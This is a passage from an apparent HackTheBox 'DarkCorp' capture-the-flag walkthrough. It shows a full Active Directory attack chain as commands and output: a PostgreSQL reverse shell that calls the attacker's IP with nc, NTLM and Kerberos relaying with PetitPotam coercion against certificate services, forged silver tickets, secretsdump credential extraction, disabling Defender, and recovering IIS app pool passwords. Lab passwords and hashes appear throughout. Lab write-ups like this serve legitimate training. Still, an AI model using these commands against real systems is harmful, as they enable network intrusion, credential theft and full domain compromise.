SMB         172.16.20.2     445    WEB-01           [*] Windows Server 2022 Build 20348 x64 (name:WEB-01) (domain:darkcorp.htb) (signing:False) (SMBv1:False)
SMB         172.16.20.2     445    WEB-01           [-] darkcorp.htb\pleaseletmein: STATUS_LOGON_FAILURE

└─$ proxychains -q netexec smb 172.16.20.1 -u '' -p ''
SMB         172.16.20.1     445    DC-01            [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:False)
SMB         172.16.20.1     445    DC-01            [+] darkcorp.htb\:

└─$ proxychains -q netexec smb 172.16.20.1 -u 'guest' -p '' --shares
SMB         172.16.20.1     445    DC-01            [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:False)
SMB         172.16.20.1     445    DC-01            [-] darkcorp.htb\guest: STATUS_ACCOUNT_DISABLED

└─$ proxychains -q netexec smb 172.16.20.1 -u 'pleaseletmein' -p '' --shares
SMB         172.16.20.1     445    DC-01            [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:False)
SMB         172.16.20.1     445    DC-01            [-] darkcorp.htb\pleaseletmein: STATUS_LOGON_FAILURE

SMB is not accessible with guest user or anonymous login on both machines.

We are able to SSH into DC-01, but something is strange.. we are still on the same box. Same file system and everything.

ebelford@drip:/tmp$ ssh ebelford@DC-01
ebelford@drip:~$ id
uid=1002(ebelford) gid=1002(ebelford) groups=1002(ebelford)

There's webserver on .2 which is IIS default installation. There's also port 5000, but we don't have credentials.

Dirbusting Internal Servers

Writeup-15.png

└─$ proxychains -q feroxbuster -u 'http://172.16.20.2/' -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt --thorough -n -D -C 404,403,400 -S 0,1293301      GET        2l       10w      167c http://172.16.20.2/aspnet_client/system_web => http://172.16.20.2/aspnet_client/system_web/

aspnet_client folder enumeration and fuzzing

└─$ proxychains -q feroxbuster -u 'http://172.16.20.2/aspnet_client/system_web' -w ./aspnet_dirs --thorough -n -D -C 404,403,400 -S 0,1293
301      GET        2l       10w      177c http://172.16.20.2/aspnet_client/system_web/4_0_30319 => http://172.16.20.2/aspnet_client/system_web/4_0_30319/

Permission denied, but probably useful in smth?

Postgres Backup

Postgres owns /var/backups/postgres, since logs had credentials something could also be there?

ebelford@drip:/var/backups$ find / -user postgres 2>/dev/null | grep -vE '^/(run|proc|sys|dev)/'
/etc/postgresql
/etc/postgresql/15
/etc/postgresql/15/main
/etc/postgresql/15/main/environment
/etc/postgresql/15/main/pg_hba.conf
/etc/postgresql/15/main/pg_ident.conf
/etc/postgresql/15/main/pg_ctl.conf
/etc/postgresql/15/main/conf.d
/etc/postgresql/15/main/start.conf
/etc/postgresql/15/main/postgresql.conf
/var/backups/postgres
/var/log/postgresql/postgresql-15-main.log.6.gz
/var/log/postgresql/postgresql-15-main.log.7.gz
/var/log/postgresql/postgresql-15-main.log.5.gz
/var/log/postgresql/postgresql-15-main.log.3.gz
/var/log/postgresql/postgresql-15-main.log.1
/var/log/postgresql/postgresql-15-main.log
/var/log/postgresql/postgresql-15-main.log.4.gz
/var/log/postgresql/postgresql-15-main.log.2.gz
/var/lib/postgresql
/var/lib/postgresql/.local
/var/lib/postgresql/.local/share
/var/lib/postgresql/.gnupg
/var/lib/postgresql/.lesshst
/var/lib/postgresql/15
/var/lib/postgresql/15/main

ebelford@drip:/var/backups$ PGPASSWORD='2Qa2SsBkQvsc' psql -U dripmail_dba -h localhost -p 5432 -d dripmail -c "SELECT pg_ls_dir('/var/backups/postgres');"
        pg_ls_dir
--------------------------
 dev-dripmail.old.sql.gpg
(1 row)

ebelford@drip:/tmp$ PGPASSWORD='2Qa2SsBkQvsc' psql -U dripmail_dba -h localhost -p 5432 -d dripmail -c "COPY (SELECT pg_read_binary_file('/var/backups/postgres/dev-dripmail.old.sql.gpg')) TO '/tmp/dev-dripmail.old.sql.gpg';"
COPY 1

└─$ sshpass -p 'ThePlague61780' scp ebelford@drip.htb:/tmp/dev-dripmail.old.sql.gpg dev-dripmail.old.sql.gpg.hex
└─$ cat dev-dripmail.old.sql.gpg.hex | xxd -r -p > dev-dripmail.old.sql.gpg
└─$ file dev-dripmail.old.sql.gpg
dev-dripmail.old.sql.gpg: PGP RSA encrypted session key - keyid: 11123366 61D8BC1F RSA (Encrypt or Sign) 3072b .
└─$ gpg -d dev-dripmail.old.sql.gpg
gpg: encrypted with RSA key, ID 1112336661D8BC1F
gpg: decryption failed: No secret key

└─$ sshpass -p 'ThePlague61780' scp dev-dripmail.old.sql.gpg ebelford@drip.htb:/tmp/sql.gpg
ebelford@drip:/tmp$ gpg -d sql.gpg
gpg: encrypted with RSA key, ID 1112336661D8BC1F
gpg: decryption failed: No secret key

Looks like we will need a private key to decrypt this file.

Postgres RCE

Postgres allows command execution too!

Writeup-16.png

ebelford@drip:/tmp$ PGPASSWORD='2Qa2SsBkQvsc' psql -U dripmail_dba -h localhost -p 5432 -d dripmail -c "COPY (SELECT '') to PROGRAM 'nc 10.10.14.20 4444 -e /bin/bash'"
(remote) postgres@drip:/var/lib/postgresql/15/main$ id
uid=102(postgres) gid=110(postgres) groups=110(postgres),109(ssl-cert)

(remote) postgres@drip:/var/backups/postgres$ gpg -d dev-dripmail.old.sql.gpg > /tmp/old.sql
# Enter PGPASSWORD

New users

-- Data for Name: Admins; Type: TABLE DATA; Schema: public; Owner: postgres
--

COPY public."Admins" (id, username, password, email) FROM stdin;
1       bcase   dc5484871bc95c4eab58032884be7225        bcase@drip.htb
2   victor.r    cac1c7b0e7008d67b6db40c03e76b9c0    victor.r@drip.htb
3   ebelford    8bbd7f88841b4223ae63c8848969be86    ebelford@drip.htb

Creds: victor.r:victor1gustavo@#

SMB

└─$ proxychains -q netexec smb 172.16.20.1 -u 'victor.r' -p 'victor1gustavo@#' --shares
SMB         172.16.20.1     445    DC-01            [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:False)
SMB         172.16.20.1     445    DC-01            [+] darkcorp.htb\victor.r:victor1gustavo@#
SMB         172.16.20.1     445    DC-01            [*] Enumerated shares
SMB         172.16.20.1     445    DC-01            Share           Permissions     Remark
SMB         172.16.20.1     445    DC-01            -----           -----------     ------
SMB         172.16.20.1     445    DC-01            ADMIN$                          Remote Admin
SMB         172.16.20.1     445    DC-01            C$                              Default share
SMB         172.16.20.1     445    DC-01            CertEnroll      READ            Active Directory Certificate Services share
SMB         172.16.20.1     445    DC-01            IPC$            READ            Remote IPC
SMB         172.16.20.1     445    DC-01            NETLOGON        READ            Logon server share
SMB         172.16.20.1     445    DC-01            SYSVOL          READ            Logon server share

└─$ proxychains -q netexec smb 172.16.20.1 -u 'victor.r' -p 'victor1gustavo@#' -M spider_plus -o DOWNLOAD_FLAG=True OUTPUT_FOLDER=./

We have some certificates related to DC-01

└─$ tree 172.16.20.1/CertEnroll
172.16.20.1/CertEnroll
├── DARKCORP-DC-01-CA+.crl
├── DARKCORP-DC-01-CA.crl
├── DC-01.darkcorp.htb_DARKCORP-DC-01-CA(1).crt
├── DC-01.darkcorp.htb_DARKCORP-DC-01-CA.crt
└── nsrev_DARKCORP-DC-01-CA.asp

Some ASP code

└─$ cat nsrev_DARKCORP-DC-01-CA.asp
<%
Response.ContentType = "application/x-netscape-revocation"
serialnumber = Request.QueryString
set Admin = Server.CreateObject("CertificateAuthority.Admin")

stat = Admin.IsValidCertificate("DC-01.darkcorp.htb\DARKCORP-DC-01-CA", serialnumber)

if stat = 3 then Response.Write("0") else Response.Write("1") end if
%>

LDAP

└─$ proxychains -q ldapdomaindump  -u 'DARKCORP.HTB\victor.r' -p 'victor1gustavo@#' -dc-ip 172.16.20.1 -o ldap_dump --no-json --no-grep
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

Writeup-17.png

TRUSTED_FOR_DELEGATION is interesting.. https://www.netexec.wiki/ldap-protocol/unconstrained-delegation

Writeup-18.png

taylor.b.adm is our next target since we can RDP WinRM as her

Get all the users:

└─$ proxychains -q netexec smb 172.16.20.1 -u 'victor.r' -p 'victor1gustavo@#' --rid-brute 10000 | grep SidTypeUser | awk '{split($6, a, "\\"); print(a[2])}' | tee users.txt
Administrator
Guest
krbtgt
DC-01$
victor.r
svc_acc
john.w
angela.w
angela.w.adm
taylor.b
DRIP$

Hmmm... odd. netexec seems to have missed few accounts? 🤔

Users from ldap:

Users
bryce.c
eugene.b
taylor.b.adm
taylor.b
angela.w.adm
angela.w
john.w
svc_acc
victor.r
krbtgt
Guest
Administrator

HTTP (5000)

Using victor's credentials we can login into the port 5000 application!

Writeup-19.png

NTLM Authentication

I wanted to send requests to Burp, but was unsuccessful because we are already proxying SOCKS5

Writeup-21.png

Writeup-20.png

Authorization attempts were unsuccessful, but it's doing some kind of NTLM authentication...

Turns out you have to enable the NTLM auth in settings: https://portswigger.net/support/configuring-ntlm-with-burp-suite

Writeup-22.png

NTLM Relaying to LDAP

NTLM Relaying to LDAP - The Hail Mary of Network Compromise

└─$ impacket-ntlmrelayx -t "ldap://172.16.20.3" --http-port 8000
└─$ sshpass -p 'victor1gustavo@#' ssh ebelford@drip.htb -R 4444:127.0.0.1:8000
ebelford@drip:~$ ss -a | grep 4444
tcp   LISTEN    0      128                                              127.0.0.1:4444 

Doesn't work because because the necessary flag is not set in sshd_config

cat /etc/ssh/sshd_config | grep -i gateway 
#GatewayPorts no

# Start chisel
└─$ chisel server -p 36000 --reverse

# Create SOCKS5 proxy
└─$ sshpass -p 'ThePlague61780' scp ./chisel ebelford@drip.htb:/tmp/chisel
ebelford@drip:/tmp$ chmod +x ./chisel
ebelford@drip:/tmp$ /tmp/chisel client 10.10.14.20:36000 R:socks &

# Start the server on remote
└─$ proxychains -q impacket-ntlmrelayx -t "ldap://172.16.20.1" --http-port 8003 --no-smb-server --no-dump --no-da --no-acl --no-validate-privs --interactive

We are essentially replacing SSH with Chisel, the path stays the same.

└─$ proxychains -q curl 'http://172.16.20.2:5000/status' --json '{"protocol":"http","host":"drip.darkcorp.htb","port":"8003"}' -u 'victor.r:victor1gustavo@#' --ntlm
{"message":"http://drip.darkcorp.htb:8003 is down (HTTP 401)","status":"Error!"}

We get an interactive ldap shell \o/

[*] Servers started, waiting for connections
[*] HTTPD(8003): Client requested path: /
[*] HTTPD(8003): Client requested path: /
[*] HTTPD(8003): Client requested path: /
[*] HTTPD(8003): Connection from 127.0.0.1 controlled, attacking target ldap://172.16.20.1
[*] HTTPD(8003): Client requested path: /
[*] HTTPD(8003): Authenticating against ldap://172.16.20.1 as DARKCORP/SVC_ACC SUCCEED
[*] Started interactive Ldap shell via TCP on 127.0.0.1:11000 as DARKCORP/SVC_ACC

└─$ ncat 0 11000
# whoami
u:darkcorp\svc_acc

I think we might need to do shadow credentials attack and this is not implemented in impacket for now I think (Speaking from Mist box)

└─$ git clone https://github.com/Tw1sm/impacket.git -b interactive-ldap-shadow-creds
└─$ cd impacket
└─$ python -m venv venv
└─$ source ./venv/bin/activate
└─$ pip install -e .
└─$ proxychains -q python examples/ntlmrelayx.py -t "ldap://172.16.20.1" --http-port 8003 --no-smb-server --no-dump --no-da --no-acl --no-validate-privs --interactive

Nothing works, permission denied on everything 😭

Previously bloodhound was not able to dump any data because it failed to find LDAP server. Turns out you have to edit dnat in proxychains configuration...

└─$ grep ^dnat /etc/proxychains4.conf
dnat 10.129.49.111 172.16.20.1

└─$ proxychains -q bloodhound-python -u 'victor.r' -p 'victor1gustavo@#' -d darkcorp.htb -dc dc-01.darkcorp.htb -ns 172.16.20.1 --zip --dns-tcp -c all

Relaying Kerberos over SMB using krbrelayx

Abusing multicast poisoning for pre-authenticated Kerberos relay over HTTP with Responder and krbrelayxRelaying Kerberos over SMB using krbrelayx

This is why you RTFM... ntlmrelayx can add DNS records and svc_acc is part of DnsAdmins group meaning this action is possible, the Kerberos over SMB becomes possible.

└─$ impacket-ntlmrelayx --help
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
LDAP client options:
  --add-dns-record NAME IPADDR
                        Add the <NAME> record to DNS via LDAP pointing to <IPADDR>

interactive-ldap-shadow-creds branch doesn't have this option, use latest official source.

chisel server -p 36000 --reverse
sshpass -p 'ThePlague61780' ssh ebelford@drip.htb 'chmod +x /tmp/chisel'
sshpass -p 'ThePlague61780' ssh ebelford@drip.htb '/tmp/chisel client 10.10.14.130:36000 R:socks 8003'

proxychains -q impacket-ntlmrelayx -t 'ldap://172.16.20.1' --http-port 8003 --no-smb-server --no-dump --no-da --no-acl --no-validate-privs -ts --add-dns-record 'dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.10.14.130

proxychains -q curl 'http://172.16.20.2:5000/status' -u 'victor.r:victor1gustavo@#' --ntlm --json '{"protocol":"http","host":"drip.darkcorp.htb","port":"8003"}'

Note: proxychains somehow failed to start server on drip.htb, so port forward 8003 from your machine to drip

Writeup-23.png

└─$ proxychains krbrelayx-krbrelayx -t 'https://dc-01.darkcorp.htb/certsrv/certfnsh.asp' --adcs -v 'WEB-01$' -debug
└─$ proxychains -q /opt/scripts/exploit/PetitPotam/PetitPotam.py -u 'victor.r' -p 'victor1gustavo@#' -d 'darkcorp.htb' 'dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' WEB-01

Note: You have to perform this attack quickly, add domain and right after fire the PetitPotam (have krbrelayx ready) or it won't work.... Probably HTB cronjob running every 2 second or smth

Writeup-24.png

I had to disable dnsmasq so krbrelayx would work 😶

Pass The Certificate

https://www.thehacker.recipes/ad/movement/kerberos/pass-the-certificate

└─$ proxychains -q certipy-ad auth -pfx 'WEB-01$.pfx' -dc-ip '172.16.20.1' -username 'WEB-01$' -domain 'darkcorp.htb'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: web-01$@darkcorp.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'web-01.ccache'
[*] Trying to retrieve NT hash for 'web-01$'
[*] Got hash for 'web-01$@darkcorp.htb': aad3b435b51404eeaad3b435b51404ee:8f33c7fc7ff515c1f358e488fbb8b675

└─$ proxychains -q netexec smb 172.16.20.1 -u 'WEB-01$' -H '8f33c7fc7ff515c1f358e488fbb8b675'
SMB         172.16.20.1     445    DC-01            [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:False)
SMB         172.16.20.1     445    DC-01            [+] darkcorp.htb\WEB-01$:8f33c7fc7ff515c1f358e488fbb8b675

└─$ proxychains -q netexec smb 172.16.20.2 -u 'WEB-01$' -H '8f33c7fc7ff515c1f358e488fbb8b675'
SMB         172.16.20.2     445    WEB-01           [*] Windows Server 2022 Build 20348 x64 (name:WEB-01) (domain:darkcorp.htb) (signing:False) (SMBv1:False)
SMB         172.16.20.2     445    WEB-01           [+] darkcorp.htb\WEB-01$:8f33c7fc7ff515c1f358e488fbb8b675

The machine account can't do much directly, but we can forge Silver Ticket and priv esc.

Silver Ticket

https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/silverhttps://www.netexec.wiki/ldap-protocol/find-domain-sid

└─$ proxychains -q netexec ldap 172.16.20.1 -u 'WEB-01$' -H '8f33c7fc7ff515c1f358e488fbb8b675' --get-sid
SMB         172.16.20.1     445    DC-01            [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:False)
LDAP        172.16.20.1     389    DC-01            [+] darkcorp.htb\WEB-01$:8f33c7fc7ff515c1f358e488fbb8b675
LDAP        172.16.20.1     389    DC-01            Domain SID S-1-5-21-3432610366-2163336488-3604236847

└─$ proxychains -q impacket-ticketer  -nthash "8f33c7fc7ff515c1f358e488fbb8b675" -domain-sid "S-1-5-21-3432610366-2163336488-3604236847" -domain "darkcorp.htb" -spn "cifs/web-01.darkcorp.htb" "Administrator"
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for darkcorp.htb/Administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in Administrator.ccache

└─$ export KRB5CCNAME=$(readlink -f ./Administrator.ccache)

└─$ klist
Ticket cache: FILE:/home/woyag/Desktop/Rooms/DarkCorp/Administrator.ccache
Default principal: Administrator@DARKCORP.HTB

Valid starting       Expires              Service principal
02/13/2025 13:12:03  02/11/2035 13:12:03  cifs/web-01.darkcorp.htb@DARKCORP.HTB
        renew until 02/11/2035 13:12:03

Web-01 pwned

Dump hashes as Administrator

└─$ proxychains -q impacket-secretsdump -k -no-pass 'DARKCORP.HTB'/'Administrator'@'WEB-01.DARKCORP.HTB' -dc-ip 172.16.20.1
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x4cf6d0e998d53752d088e233abb4bed6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:88d84ec08dad123eb04a060a74053f21:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
DARKCORP.HTB/svc_acc:$DCC2$10240#svc_acc#3a5485946a63220d3c4b118b36361dbb: (2025-02-13 14:10:23)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
darkcorp\WEB-01$:plain_password_hex:4100520044006c002600710072005a00640022007400230061003d004f00520063005e006b006e004f005d00270034004b0041003a003900390074006200320031006a0040005a004f004f005c004b003b00760075006600210063004f0075002f003c0072005d0043004c004a005800250075006c002d00440064005f006b00380038002c00270049002c0046004000680027003b004500200021003b0042004d005f0064003b0066002300700068005500440069002f0054002300320022005f004c0056004c003c0049006f002600480076002c005d00610034005500470077004a0076005f003400740054004800
darkcorp\WEB-01$:aad3b435b51404eeaad3b435b51404ee:8f33c7fc7ff515c1f358e488fbb8b675:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x1004cecdc9b33080d25a4a29126d4590eb555c5f
dpapi_userkey:0x7f3f9f871ea1dafaea01ae4ccf6e3f7ee535e472
[*] NL$KM
 0000   DD C9 21 14 B9 23 69 1B  D8 BE FD 57 6B 3C 3E E1   ..!..#i....Wk<>.
 0010   9D 3D 3F 74 82 AF 75 33  FD 74 61 6E B7 24 55 AF   .=?t..u3.tan.$U.
 0020   6F 61 A0 BC 2B 2A 86 CF  6E EC E0 D3 37 98 FE E5   oa..+*..n...7...
 0030   14 54 7D A9 A6 45 19 37  F1 20 24 4B 18 43 19 72   .T}..E.7. $K.C.r
NL$KM:ddc92114b923691bd8befd576b3c3ee19d3d3f7482af7533fd74616eb72455af6f61a0bc2b2a86cf6eece0d33798fee514547da9a6451937f120244b18431972
[*] Cleaning up...
[*] Stopping service RemoteRegistry

└─$ proxychains -q evil-winrm -u 'Administrator' -H '88d84ec08dad123eb04a060a74053f21' -i web-01.darkcorp.htb

User.txt

*Evil-WinRM* PS C:\Users\Administrator>tree /f /a
Folder PATH listing
Volume serial number is E2B2-45D5
C:.
|   HTB-Stability.exe
+---3D Objects
+---Contacts
+---Desktop
|       user.txt
+---Documents
|   +---cleanup
|   |       cleanup.ps1
|   \---WindowsPowerShell
|       \---Scripts
|           \---InstalledScriptInfos
+---Downloads
+---Favorites
+---Links
+---Music
+---Pictures
+---Saved Games
+---Searches
\---Videos
*Evil-WinRM* PS C:\Users\Administrator> cat Desktop/user.txt
9d64eebf389ef7e61b4ca459a121269c

Privilege Escalation (john.w)

---

When escalating the defender was disabled, and after some time it was not. Probably HTB players disabled it to avoid it deleting files.

Use following to disable it:

*Evil-WinRM* PS C:\Users\Administrator\Music> Set-MpPreference -DisableRealtimeMonitoring $true

---

Upload WinPeas

*Evil-WinRM* PS C:\Users\Administrator\Music> curl.exe 10.10.14.130/wp.exe -O
*Evil-WinRM* PS C:\Users\Administrator\Music> .\wp.exe | tee -filepath wp.log # Kept crashing (?)
*Evil-WinRM* PS C:\Users\Administrator\Music> .\wp.exe systeminfo userinfo
ÉÍÍÍÍÍÍÍÍÍ͹ PowerShell Settings
    PowerShell v2 Version: 2.0
    PowerShell v5 Version: 5.1.20348.1
    PowerShell Core Version:
    Transcription Settings:
    Module Logging Settings:
    Scriptblock Logging Settings:
    PS history file: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    PS history size: 6B

appcmd

There are some files I have not yet seen in IIS configs

*Evil-WinRM* PS C:\inetpub\history> tree /f /a
Folder PATH listing
Volume serial number is E2B2-45D5
C:.
+---CFGHISTORY_0000000001
|       administration.config
|       applicationHost.config
|
+---CFGHISTORY_0000000002
|       administration.config
|       applicationHost.config
|
+---CFGHISTORY_0000000003
|       administration.config
|       applicationHost.config
|
+---CFGHISTORY_0000000004
|       administration.config
|       applicationHost.config
|
\---CFGHISTORY_0000000005
        administration.config
        applicationHost.config
*Evil-WinRM* PS C:\inetpub\history> cat */*.config | sls pass
<processModel identityType="SpecificUser" userName="darkcorp\svc_acc"
password="[enc:IISWASOnlyCngProvider:ZCCsQ1twCWUKbeL4LsB79sZ2R/BuZBLaPpd4Y+3YjssX74omCfo3IwMPBKK59P7zXm578vFguUoQ3kUQSw2aWMt+c8LHnsUc1VIkFoHZvXESnvbBklSKBvEvpEjlJ6XZv0JQLknMHg+byBnlGoFhgQ==:enc]" />
<processModel identityType="SpecificUser" userName="darkcorp\svc_acc"
password="[enc:IISWASOnlyCngProvider:ZCCsQ1twCWUKbeL4LsB79sZ2R/BuZBLaPpd4Y+3YjssX74omCfo3IwMPBKK59P7zXm578vFguUoQ3kUQSw2aWMt+c8LHnsUc1VIkFoHZvXESnvbBklSKBvEvpEjlJ6XZv0JQLknMHg+byBnlGoFhgQ==:enc]" />

https://www.netspi.com/blog/technical-blog/network-pentesting/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/

*Evil-WinRM* PS C:\inetpub\history> C:\Windows\System32\inetsrv\appcmd.exe list apppools
APPPOOL "DefaultAppPool" (MgdVersion:v4.0,MgdMode:Integrated,state:Started)
APPPOOL ".NET v4.5 Classic" (MgdVersion:v4.0,MgdMode:Classic,state:Started)
APPPOOL ".NET v4.5" (MgdVersion:v4.0,MgdMode:Integrated,state:Started)
*Evil-WinRM* PS C:\inetpub\history> C:\Windows\System32\inetsrv\appcmd.exe list apppools DefaultAppPool /text:* | sls 'username|password'
      userName:"darkcorp\svc_acc"
      password:"VeteranLimitedCookies6!"

*Evil-WinRM* PS C:\inetpub\history> C:\Windows\System32\inetsrv\appcmd.exe list apppools '.NET v4.5 Classic' /text:* | sls 'username|password'
      userName:""
      password:""

*Evil-WinRM* PS C:\inetpub\history> C:\Windows\System32\inetsrv\appcmd.exe list apppools '.NET v4.5' /text:* | sls 'username|password'
      userName:""
      password:""

Password Reuse (Attempt)

We can login we svc_acc, but since it's only part of DnsAdmins there's not much we can do.

└─$ proxychains -q netexec smb dc-01.darkcorp.htb -u users.txt -p 'VeteranLimitedCookies6!' --continue-on-success
SMB         224.0.0.1       445    DC-01            [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:False)
SMB         224.0.0.1       445    DC-01            [-] darkcorp.htb\Administrator:VeteranLimitedCookies6! STATUS_LOGON_FAILURE
SMB         224.0.0.1       445    DC-01            [-] darkcorp.htb\Guest:VeteranLimitedCookies6! STATUS_LOGON_FAILURE
SMB         224.0.0.1       445    DC-01            [-] darkcorp.htb\krbtgt:VeteranLimitedCookies6! STATUS_LOGON_FAILURE
SMB         224.0.0.1       445    DC-01            [-] darkcorp.htb\DC-01$:VeteranLimitedCookies6! STATUS_LOGON_FAILURE
SMB         224.0.0.1       445    DC-01            [-] darkcorp.htb\victor.r:VeteranLimitedCookies6! STATUS_LOGON_FAILURE
SMB         224.0.0.1       445    DC-01            [+] darkcorp.htb\svc_acc:VeteranLimitedCookies6!
SMB         224.0.0.1       445    DC-01            [-] darkcorp.htb\john.w:VeteranLimitedCookies6! STATUS_LOGON_FAILURE
SMB         224.0.0.1       445    DC-01            [-] darkcorp.htb\angela.w:VeteranLimitedCookies6! STATUS_LOGON_FAILURE
SMB         224.0.0.1       445    DC-01            [-] darkcorp.htb\angela.w.adm:VeteranLimitedCookies6! STATUS_LOGON_FAILURE
SMB         224.0.0.1       445    DC-01            [-] darkcorp.htb\taylor.b:VeteranLimitedCookies6! STATUS_LOGON_FAILURE
SMB         224.0.0.1       445    DC-01            [-] darkcorp.htb\DRIP$:VeteranLimitedCookies6! STATUS_LOGON_FAILURE

*Evil-WinRM* PS C:\inetpub> cat \inetpub\logs\LogFiles\*\*.log | sls pass
...
2025-02-13 16:35:10 172.16.20.2 GET /common/download/resource resource=/profile/../../../../etc/passwd 80 - 172.16.20.3 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/104.0.0.0+Safari/537.36 - 404 0 2 16
2025-02-13 16:35:10 172.16.20.2 GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd#/a - 80 - 172.16.20.3 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/104.0.0.0+Safari/537.36 - 404 11
0 13
2025-02-13 16:35:10 172.16.20.2 GET /test/pathtraversal/master/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd - 80 - 172.16.20.3 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/104.0.0.0+Safari/537.36 - 404 11 0
18
2025-02-13 16:35:10 172.16.20.2 GET /wxjsapi/saveYZJFile fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt 80 - 172.16.20.3 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/104.0.0.0+Safari/537.36 - 404
0 2 30
2025-02-13 16:35:10 172.16.20.2 POST /password_change.cgi - 80 - 172.16.20.3 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/104.0.0.0+Safari/537.36 http://172.16.20.2 404 0 2 22
2025-02-13 16:35:10 172.16.20.2 GET /eam/vib id=/etc/passwd 80 - 172.16.20.3 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/104.0.0.0+Safari/537.36 - 404 0 2 32
2025-02-13 16:35:10 172.16.20.2 GET /backup/auto.php password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php 80 - 172.16.20.3 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/104.0.0.0+Safari/537.36
- 404 0 2 35
2025-02-13 17:13:50 172.16.20.2 GET /.htpasswd - 80 - 172.16.20.3 gobuster/3.6 - 404 0 2 1
2025-02-13 17:13:50 172.16.20.2 GET /.passwd - 80 - 172.16.20.3 gobuster/3.6 - 404 0 2 0
...

Nothing

└─$ proxychains -q netexec smb dc-01.darkcorp.htb -u users.txt -p 'NzbwpQSdbY06Dngnoteo2wdgiekm7j4N' --continue-on-success

There was some exe file in Admin's directory we could check out

└─$ impacket-smbserver -smb2support share .
*Evil-WinRM* PS C:\Users\Administrator> xcopy C:\Users\Administrator\HTB-Stability.exe \\10.10.14.130\share

Unfortunately the binary is not written in C#, but in Golang

└─$ file HTB-Stability.exe
HTB-Stability.exe: PE32+ executable (console) x86-64, for MS Windows, 8 sections

Rabbit hole :/

PS C:\Users\\Desktop> .\HTB-Stability.exe
ATTN: This is not part of the path and only serves as a stability purpose

Update bloodhound data

└─$ proxychains -q bloodhound-python -u 'svc_acc' -p 'VeteranLimitedCookies6!' -d darkcorp.htb -dc dc-01.darkcorp.htb -ns 172.16.20.1 --zip --dns-tcp --dns-timeout 100 -c all -op svc_acc

Nothing new...

Winpeas.bat

exe didn't work, but bat version worked with WinPeas

*Evil-WinRM* PS C:\Users\Administrator\Music> curl.exe 10.10.14.130/wp.bat -O
*Evil-WinRM* PS C:\Users\Administrator\Music> cmd /c "C:\Users\Administrator\Music\wp.bat"
 [+] Number of cached creds
   [i] You need System-rights to extract them

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    CACHEDLOGONSCOUNT    REG_SZ    10
 [+] DPAPI MASTER KEYS
   [i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt
   [?] https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#dpapi


    Directory: C:\Users\Administrator\AppData\Roaming\Microsoft\Protect


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d---s-         1/16/2025  10:35 AM                S-1-5-21-2988385993-1727309239-2541228647-500


 [+] DPAPI MASTER KEYS
